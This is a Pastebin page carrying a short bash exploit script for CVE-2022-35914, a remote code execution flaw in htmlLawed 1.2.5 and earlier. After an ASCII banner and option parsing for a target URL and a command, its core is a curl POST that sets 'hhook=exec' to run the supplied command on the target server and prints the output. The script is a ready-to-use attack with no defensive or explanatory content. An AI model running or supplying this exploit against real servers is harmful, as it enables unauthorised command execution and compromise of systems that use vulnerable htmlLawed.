Advertisement
FlyFar

htmlLawed 1.2.5 - Remote Code Execution (RCE) - CVE-2022-35914

May 19th, 2024
879
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.25 KB | Cybersecurity | 0 0
  1. # Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE)
  2. # Date: 2024-04-24
  3. # Exploit Author: Miguel Redondo (aka d4t4s3c)
  4. # Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
  5. # Software Link: https://github.com/kesar/HTMLawed
  6. # Version: <= 1.2.5
  7. # Tested on: Linux
  8. # CVE: CVE-2022-35914
  9.  
  10. banner(){
  11.   echo "  ______     _______     ____   ___ ____  ____      _________  ___  _ _  _"
  12.   echo " / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ / ___|/ _ \/ | || |"
  13.   echo "| |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_"
  14.   echo "| |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__   _|"
  15.   echo " \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/____/  /_/|_|  |_|"
  16. }
  17.  
  18. while getopts ":u:c:" arg; do
  19.   case $arg in
  20.     u) URL=$OPTARG; let parameter_counter+=1 ;;
  21.     c) CMD=$OPTARG; let parameter_counter+=1 ;;
  22.   esac
  23. done
  24.  
  25.  
  26. if [ -z "$URL" ] || [ -z "$CMD" ]; then
  27.   banner
  28.   echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n"
  29.   exit
  30. else
  31.   banner
  32.   echo -e "\n[+] Command output:"
  33. fi
  34.  
  35. curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\&nbsp; \[[0-9]+\] =\>'| sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/'
  36.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement